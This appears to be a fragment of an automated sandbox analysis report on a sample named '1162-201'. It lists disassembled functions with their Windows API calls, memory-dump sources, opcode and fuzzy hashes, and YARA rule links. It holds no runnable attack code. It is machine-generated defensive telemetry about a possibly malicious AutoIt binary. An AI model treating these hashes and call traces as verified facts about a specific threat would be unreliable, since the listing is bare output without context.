                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                      • Instruction ID: 763d015e8792f60134aa4ea1ea522c9b1d76899a80b0d72d02a014e4fbbab9dc
                                                                      • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                      • Instruction Fuzzy Hash: 8712BE24E18658C7EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4E85CF5A
                                                                      Function 00CA709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: LoadString
                                                                      • String ID:
                                                                      • API String ID: 2948472770-0
                                                                      • Opcode ID: 1835030a01636043d3e092c9db19c5bf53e88e8ca28b903e8a380170f3bec27f
                                                                      • Instruction ID: c7531d67b8b860bc075127bf9683ef1e780af8b4f1128c2dd6a2a522d8b7eddf
                                                                      • Opcode Fuzzy Hash: 1835030a01636043d3e092c9db19c5bf53e88e8ca28b903e8a380170f3bec27f
                                                                      • Instruction Fuzzy Hash: A6D17C74A0420AEFCF14EF98D8819EEBBB5FF49314F144159E915AB291DB30AE81DF90
                                                                      Function 00C3FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction ID: 792afdb8bdccbfaeee00aced54de734b35e94a4388f686a32aac7dae50a00e63
                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction Fuzzy Hash: 6C31F574A10109DBC728CF59E484969F7B1FF49300F249AA9E81ACB655D731EEC2CBC0
                                                                      Function 00C24ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C24E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C24EDD,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24E9C
                                                                        • Part of subcall function 00C24E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C24EAE
                                                                        • Part of subcall function 00C24E90: FreeLibrary.KERNEL32(00000000,?,?,00C24EDD,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24EC0
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24EFD
                                                                        • Part of subcall function 00C24E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C63CDE,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24E62
                                                                        • Part of subcall function 00C24E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C24E74
                                                                        • Part of subcall function 00C24E59: FreeLibrary.KERNEL32(00000000,?,?,00C63CDE,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24E87
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressFreeProc
                                                                      • String ID:
                                                                      • API String ID: 2632591731-0
                                                                      • Opcode ID: 292f6051b73d064ef961f11fd8c5d63d1d35175e87cb16c144b6b9fcb6dfcbeb
                                                                      • Instruction ID: d213282ec0657e17a581f3c94821a371a105d5831366b9f8aedcd1bca775d8a7
                                                                      • Opcode Fuzzy Hash: 292f6051b73d064ef961f11fd8c5d63d1d35175e87cb16c144b6b9fcb6dfcbeb
                                                                      • Instruction Fuzzy Hash: 36110A32610215ABDF28FFA4ED42FAD77A5AF90710F10442DF542A65C1DEB09E15AB50
                                                                      Function 00C58402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: __wsopen_s
                                                                      • String ID:
                                                                      • API String ID: 3347428461-0
                                                                      • Opcode ID: ec398097ad0c7ba83b339ba374d1066c59cadeabb0a6d4047352af98725c41a3
                                                                      • Instruction ID: f30923892979071522c2cd49a84e7f7afa625e00861493c81887e04a8d036fd9
                                                                      • Opcode Fuzzy Hash: ec398097ad0c7ba83b339ba374d1066c59cadeabb0a6d4047352af98725c41a3
                                                                      • Instruction Fuzzy Hash: E411487590410AAFCB05DF58E940A9F7BF9EF48301F104059FC09AB312DB30DA15CBA9
                                                                      Function 00C4E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                      • Instruction ID: 1577ce8737c6c50ce1caede9ddf87ea36775f56c513e9e696c3cfbb4b33cc94a
                                                                      • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                      • Instruction Fuzzy Hash: D3F0F436510A1896C7313A7A9C05BDA339CBF62336F120715F825A22D2CF74994AA6A9
                                                                      Function 00C29CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID:
                                                                      • API String ID: 176396367-0
                                                                      • Opcode ID: b69da61d860569f929b1c99c18b9dc9fd277deabbe59855a51152ec416ee2fb7
                                                                      • Instruction ID: 67576484f1303991905cdfabb0e2f7c2589361c3a41bf117e9bec4690b38e85c
                                                                      • Opcode Fuzzy Hash: b69da61d860569f929b1c99c18b9dc9fd277deabbe59855a51152ec416ee2fb7
                                                                      • Instruction Fuzzy Hash: 44F0C8B36006116ED7149F29D806BA7BB98EF44760F10852EF619CB2D1DB31E51097A0
                                                                      Function 00C53820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00CF1444,?,00C3FDF5,?,?,00C2A976,00000010,00CF1440,00C213FC,?,00C213C6,?,00C21129), ref: 00C53852
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 14491d0b9945779f1f1e7cb3f8beac2928b1ce426015c58378dfa754f0b6f7e4
                                                                      • Instruction ID: e404e36772ac67955ab5d149d69eaf0afd0a7de98ee504897884346dffc834d4
                                                                      • Opcode Fuzzy Hash: 14491d0b9945779f1f1e7cb3f8beac2928b1ce426015c58378dfa754f0b6f7e4
                                                                      • Instruction Fuzzy Hash: B2E0E5391002A4A6E73926679C00B9A3748AB427F6F190123BC24A74D1CB51DF8991F9
                                                                      Function 00C24F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,?,00CF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C24F6D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: 884a10b9932158cb35cc14403e3b2cf8ae047b36affcfc56d037f21554c86e87
                                                                      • Instruction ID: 74a292d44e26036955d113bb049f39da42626acbe4883bc98bc6ecf17bd3d2ab
                                                                      • Opcode Fuzzy Hash: 884a10b9932158cb35cc14403e3b2cf8ae047b36affcfc56d037f21554c86e87
                                                                      • Instruction Fuzzy Hash: 4CF0A071005321CFCB388FA5E590816B7E0FF40319310897EE1EA82910C7319844DF10
                                                                      Function 00C8CCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,00C6EE51,00CE3630,00000002), ref: 00C8CD26
                                                                        • Part of subcall function 00C8CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,00C8CD19,?,?,?), ref: 00C8CC59
                                                                        • Part of subcall function 00C8CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,00C8CD19,?,?,?,?,00C6EE51,00CE3630,00000002), ref: 00C8CC6E
                                                                        • Part of subcall function 00C8CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,00C8CD19,?,?,?,?,00C6EE51,00CE3630,00000002), ref: 00C8CC7A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: File$Pointer$Write
                                                                      • String ID:
                                                                      • API String ID: 3847668363-0
                                                                      • Opcode ID: 602cfba85bc7e7ef64363db9088091aa398bb30967d2bcbdb309f6b874401903
                                                                      • Instruction ID: 609fd163aaec615c3d4ac71ad3058d4572d979e80ac22031afdb6a1163678762
                                                                      • Opcode Fuzzy Hash: 602cfba85bc7e7ef64363db9088091aa398bb30967d2bcbdb309f6b874401903
                                                                      • Instruction Fuzzy Hash: CAE06D7A400704EFC721AF9ADD408AAFBF8FF84364710852FE996D2110D3B1AA14DB60
                                                                      Function 00C22DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C22DC4
                                                                        • Part of subcall function 00C26B57: _wcslen.LIBCMT ref: 00C26B6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: LongNamePath_wcslen
                                                                      • String ID:
                                                                      • API String ID: 541455249-0
                                                                      • Opcode ID: 8ebe9b0acae274b59a75d312204ef584d3ebc5981e122e9af8356c1f4e5f707c
                                                                      • Instruction ID: 153af8c30089c832ed22278ebd1d9efb60af3742a6f5b9ec4b855b88d896a7d2
                                                                      • Opcode Fuzzy Hash: 8ebe9b0acae274b59a75d312204ef584d3ebc5981e122e9af8356c1f4e5f707c
                                                                      • Instruction Fuzzy Hash: 8EE0CD726001245BC720D6989C05FDA77DDDFC8790F040171FD09D7248D960AD809551
                                                                      Function 00C6039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00C60704,?,?,00000000,?,00C60704,00000000,0000000C), ref: 00C603B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 2778a5a9dcb7957e18d7ed896da1a59ea508340f027fccf47eb771796f7fb271
                                                                      • Instruction ID: 3073017e34baff4bfb0f1b9e75a36dd97ca3a873c9b48ecaba5e68d47e5681a6
                                                                      • Opcode Fuzzy Hash: 2778a5a9dcb7957e18d7ed896da1a59ea508340f027fccf47eb771796f7fb271
                                                                      • Instruction Fuzzy Hash: BBD06C3204010DBBDF028F84DD46EDE3BAAFB48714F014100BE1866020C732E821AB90
                                                                      Function 00C9744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C25745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00C2949C,?,00008000), ref: 00C25773
                                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 00C976DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 1214770103-0
                                                                      • Opcode ID: 402957ba8fb6c376faf4043beb0cdefa6a1d62071aa86077834e985afc5fca3d
                                                                      • Instruction ID: 167e118d1c63eb92da4f06df2517bfcc9c789275f2b76de755c3e7eefaeac6af
                                                                      • Opcode Fuzzy Hash: 402957ba8fb6c376faf4043beb0cdefa6a1d62071aa86077834e985afc5fca3d
                                                                      • Instruction Fuzzy Hash: EB81CE306097019FCB14EF28D495B6EB7E1BF88310F04462CF8965B6A2DB30EE45DB92
                                                                      Function 00C26246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CloseHandle.KERNELBASE(?,?,00000000,00C624E0), ref: 00C26266
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: 1edea6a02ecfd47b1573b2ddc5db12afc2b9987f0c5df5e4f0d435b490f66a1d
                                                                      • Instruction ID: 5811c08ebe9f16fb08fd2ccb22570dd5653ad5925c783986066612bfca827c9b
                                                                      • Opcode Fuzzy Hash: 1edea6a02ecfd47b1573b2ddc5db12afc2b9987f0c5df5e4f0d435b490f66a1d
                                                                      • Instruction Fuzzy Hash: A5E0B675400B11CFC3358F1AE804552FBF5FFE13613204A2ED0F592A60D3B059868F60
                                                                      Function 0314BE50 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 0314BE61
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3149000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction ID: 729a9348fbac90d1d873cd2dff87243c186f1f10fee85c767fbf921d023fb546
                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction Fuzzy Hash: 58E0E67494410DDFDB00EFB8D54969E7FB4EF04301F1041A1FD01E2280D7309D608A62

                                                                      Non-executed Functions

                                                                      Function 00CB9576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00CB961A
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CB965B
                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00CB969F
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CB96C9
                                                                      • SendMessageW.USER32 ref: 00CB96F2
                                                                      • GetKeyState.USER32(00000011), ref: 00CB978B
                                                                      • GetKeyState.USER32(00000009), ref: 00CB9798
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CB97AE
                                                                      • GetKeyState.USER32(00000010), ref: 00CB97B8
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CB97E9
                                                                      • SendMessageW.USER32 ref: 00CB9810
                                                                      • SendMessageW.USER32(?,00001030,?,00CB7E95), ref: 00CB9918
                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00CB992E
                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00CB9941
                                                                      • SetCapture.USER32(?), ref: 00CB994A
                                                                      • ClientToScreen.USER32(?,?), ref: 00CB99AF
                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00CB99BC
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CB99D6
                                                                      • ReleaseCapture.USER32 ref: 00CB99E1
                                                                      • GetCursorPos.USER32(?), ref: 00CB9A19
                                                                      • ScreenToClient.USER32(?,?), ref: 00CB9A26
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CB9A80
                                                                      • SendMessageW.USER32 ref: 00CB9AAE
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CB9AEB
                                                                      • SendMessageW.USER32 ref: 00CB9B1A
                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00CB9B3B
                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00CB9B4A
                                                                      • GetCursorPos.USER32(?), ref: 00CB9B68
                                                                      • ScreenToClient.USER32(?,?), ref: 00CB9B75
                                                                      • GetParent.USER32(?), ref: 00CB9B93
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CB9BFA
                                                                      • SendMessageW.USER32 ref: 00CB9C2B
                                                                      • ClientToScreen.USER32(?,?), ref: 00CB9C84
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CB9CB4
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CB9CDE
                                                                      • SendMessageW.USER32 ref: 00CB9D01
                                                                      • ClientToScreen.USER32(?,?), ref: 00CB9D4E
                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00CB9D82
                                                                        • Part of subcall function 00C39944: GetWindowLongW.USER32(?,000000EB), ref: 00C39952
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CB9E05
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                      • String ID: @GUI_DRAGID$F
